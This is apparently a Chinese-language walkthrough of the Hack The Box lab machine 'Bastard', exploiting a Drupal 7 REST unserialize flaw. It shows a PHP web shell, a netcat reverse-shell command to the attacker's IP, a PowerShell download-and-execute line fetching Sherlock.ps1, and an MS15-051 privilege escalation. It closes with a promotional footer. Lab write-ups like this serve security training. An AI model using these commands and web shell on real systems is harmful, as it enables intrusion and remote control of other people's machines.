__出品｜MS08067實驗室（www.ms08067.com)__ 這次挑戰的是 HTB 的第7臺靶機：Bastard  **技能收穫：** * PHP Unserilaize * CMS Version Identify * Windows privilege escalation ：Sherlock ##資訊收集 ###基本資訊 Bastard IP：10.10.10.9 Kali IP：10.10.14.23 ###埠列舉 ``` nmap -A -p- -v -T4 10.10.10.9 ```  發現開啟了80(IIS)，訪問之  看起來是drupal cms，訪問 robots.txt ，發現版本變更檔案   版本：Drupal 7.54 ###漏洞發現 ``` searchsploit drupal 7.x ```  該版本存在 rce ，編輯 exploit  該exploit會攻擊由服務擴充套件建立的REST端點，我們只需要找出REST端點的名稱即可利用該漏洞。  通過目錄列舉，我們發現 endpoint 為 /rest，用其替換exploit ``` gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ./word.txt ```   ###漏洞利用 ``` php exp.php ```  沒有反應，掛上 burpsuite 看看   設定 exp 的target為 burp 的監聽埠   依然沒回應，那應該是缺少php包，未成功傳送 檢查發現，Kali缺少 php-curl 包，安裝好成功返回響應並寫入 shell.php ``` apt install php-curl ```   利用 session.json 可以偽造會話，成功登入   已知目標是 x64 的系統，我們上傳 nc.exe 下載地址：https://eternallybored.org/misc/netcat/ 給 exp 新增一個檔案上傳功能，也可以使用 smb檔案共享，使用 copy \\ip\nc64.exe nc.exe上傳 ``` $phpmine = <<<'EOD' " . shell_exec($_GET['fexec']) . ""; }; ?> EOD; $file = [ 'filename' => 'cmd.php', 'data' => $phpmine ]; ``` ``` 10.10.10.9/233.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.15 4444 ```   ###許可權提升 ``` git clone git clone https://github.com/rasta-mouse/Sherlock.git ``` Sherlock是一個在Windows下用於本地提權的PowerShell指令碼 ``` http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile - ```  提示 ms15-051 , 利用之 提權程式下載地址：https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip 上傳並執行  建立 nc 會話  至此完成 ###參考文章 Drupal 7.x RCE 漏洞分析 附EXP： https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/       **轉載請聯絡作者並註明出處！** Ms08067安全實驗室專注於網路安全知識的普及和培訓。團隊已出版《Web安全攻防：滲透測試實戰指南》，《內網安全攻防：滲透測試實戰指南》，《Python安全攻防：滲透測試實戰指南》，《Java程式碼安全審計（入門篇）》等書籍。 團隊公眾號定期分享關於CTF靶場、內網滲透、APT方面技術乾貨，從零開始、以實戰落地為主，致力於做一個實用的乾貨分享型公眾號。 官方網站：https://www.ms08067.com/ 掃描下方二維碼加入實驗室VIP社群 加入後邀請加入內部VIP群，內部微信群永久有效！        

相關推薦